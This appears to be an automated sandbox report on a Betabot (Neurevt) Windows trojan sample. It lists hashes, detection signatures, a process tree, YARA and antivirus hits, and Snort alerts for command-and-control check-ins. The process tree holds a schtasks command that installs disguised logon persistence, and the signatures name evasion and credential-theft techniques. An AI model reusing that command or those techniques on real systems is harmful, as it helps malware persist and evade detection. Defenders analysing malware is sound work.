Windows Analysis Report
BbbEtaIxAU.exe

Overview

General Information

Sample Name: BbbEtaIxAU.exe
Analysis ID: 760719
MD5: 0de785a3d83482ee5b7e3e396a641bc7
SHA1: fc7326166024e8edfec82524e4a1e98041561fa4
SHA256: 443095db638f2eb172dbfbe3730407c033b5ec86dde1e8b2f65df703b85cca51
Tags: exe, Neurevt

Detection

Betabot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Betabot
Snort IDS alert for network traffic
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Overwrites Windows DLL code with PUSH RET codes
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found C&C like URL pattern
Modifies Internet Explorer zone settings
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Contains functionality to hide a thread from the debugger
Hides that the sample has been downloaded from the Internet (zone.identifier)
Potentially malicious time measurement code found
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if Internet connection is working
Disables exception chain validation (SEHOP)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Changes image file execution options
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks for installed Antivirus programs
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BbbEtaIxAU.exe (PID: 6084 cmdline: C:\Users\user\Desktop\BbbEtaIxAU.exe MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
    • schtasks.exe (PID: 6140 cmdline: "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 712 cmdline: C:\Windows\SysWOW64\WerFault.exe MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2904 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4588 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2888 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4596 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2892 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4756 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4700 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 3208 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 3232 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4964 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2964 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4720 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2872 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4728 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2296 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4648 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4636 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
  • yvneslhpc.exe (PID: 272 cmdline: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
  • yvneslhpc.exe (PID: 5496 cmdline: "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
  • yvneslhpc.exe (PID: 3928 cmdline: "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |

Source | Rule | Description | Author | Strings
4.3.WerFault.exe.4e0000.11.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
4.3.WerFault.exe.4e0000.16.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |

No Sigma rule has matched
Timestamp | SID | Source | Destination | Protocol | Classtype
12/05/22-12:47:50.129126 | 2018784 | 192.168.2.5:49701 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:48:05.503144 | 2018784 | 192.168.2.5:49704 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:00.505069 | 2016778 | 192.168.2.5:50295 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:46:19.368387 | 2016778 | 192.168.2.5:58218 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:43.551273 | 2023765 | 192.168.2.5:49700 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:52.321288 | 2016778 | 192.168.2.5:50902 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:58.149920 | 2016778 | 192.168.2.5:53555 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:04.219546 | 2023765 | 192.168.2.5:49694 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:04.219546 | 2807970 | 192.168.2.5:49694 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:24.377403 | 2018784 | 192.168.2.5:49697 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:24.377403 | 2807970 | 192.168.2.5:49697 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:48:00.735136 | 2023765 | 192.168.2.5:49703 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:16.077326 | 2023765 | 192.168.2.5:49696 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:37.686543 | 2023765 | 192.168.2.5:49699 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:04.219546 | 2018784 | 192.168.2.5:49694 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:50.129126 | 2807970 | 192.168.2.5:49701 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:48:04.170104 | 2016778 | 192.168.2.5:54585 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:46:58.298151 | 2807970 | 192.168.2.5:49693 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:37.686543 | 2807970 | 192.168.2.5:49699 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:46:55.095514 | 2018784 | 192.168.2.5:49692 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:14.828602 | 2016778 | 192.168.2.5:65323 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:08.104904 | 2016778 | 192.168.2.5:51441 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:21.944791 | 2023765 | 192.168.2.5:49697 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:43.551273 | 2018784 | 192.168.2.5:49700 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:43.551273 | 2807970 | 192.168.2.5:49700 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:45.766359 | 2016778 | 192.168.2.5:58472 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:30.918196 | 2018784 | 192.168.2.5:49698 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:46:58.298151 | 2018784 | 192.168.2.5:49693 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:46:49.744933 | 2018784 | 192.168.2.5:49690 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:20.714375 | 2016778 | 192.168.2.5:55039 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:37.686543 | 2018784 | 192.168.2.5:49699 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:30.918196 | 2807970 | 192.168.2.5:49698 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:12.620984 | 2807970 | 192.168.2.5:49695 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:18.507456 | 2018784 | 192.168.2.5:49696 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:39.883458 | 2016778 | 192.168.2.5:52688 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:33.137125 | 2016778 | 192.168.2.5:56263 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:55.956294 | 2807970 | 192.168.2.5:49702 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:46:55.095514 | 2807970 | 192.168.2.5:49692 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:48:05.503144 | 2807970 | 192.168.2.5:49704 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:46:49.744933 | 2807970 | 192.168.2.5:49690 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:50.129126 | 2023765 | 192.168.2.5:49701 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:55.956294 | 2018784 | 192.168.2.5:49702 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:48:01.952443 | 2018784 | 192.168.2.5:49703 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:12.620984 | 2018784 | 192.168.2.5:49695 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:26.631484 | 2016778 | 192.168.2.5:56682 | 8.8.8.8:53 | UDP | Potentially Bad Traffic
12/05/22-12:47:12.620984 | 2023765 | 192.168.2.5:49695 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:54.752098 | 2023765 | 192.168.2.5:49702 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:47:18.507456 | 2807970 | 192.168.2.5:49696 | 64.70.19.203:80 | TCP | A Network Trojan was detected
12/05/22-12:48:01.952443 | 2807970 | 192.168.2.5:49703 | 64.70.19.203:80 | TCP | A Network Trojan was detected

AV Detection

Source: BbbEtaIxAU.exe | ReversingLabs: Detection: 89%
Source: BbbEtaIxAU.exe | Virustotal: Detection: 92%
Source: BbbEtaIxAU.exe | Avira: detected
Source: BbbEtaIxAU.exe | Joe Sandbox ML: detected
Source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.0.WerFault.exe.28ac67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.0.WerFault.exe.28ac67a.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.BbbEtaIxAU.exe.3420000.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.yvneslhpc.exe.cd0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 4.2.WerFault.exe.28ac67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.yvneslhpc.exe.cd0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.yvneslhpc.exe.cd0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.7.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.BbbEtaIxAU.exe.bd3da0.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.BbbEtaIxAU.exe.cd0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
Source: BbbEtaIxAU.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: BbbEtaIxAU.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:58218 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49690 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49690 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49692 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49692 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49693 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49693 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:50295 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49694 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49694 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49694 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:51441 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49695 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49695 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49695 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:65323 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49696 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49696 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49696 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:55039 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49697 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49697 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49697 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:56682 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49698 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49698 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:56263 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49699 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49699 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49699 -> 64.70.19.203:80
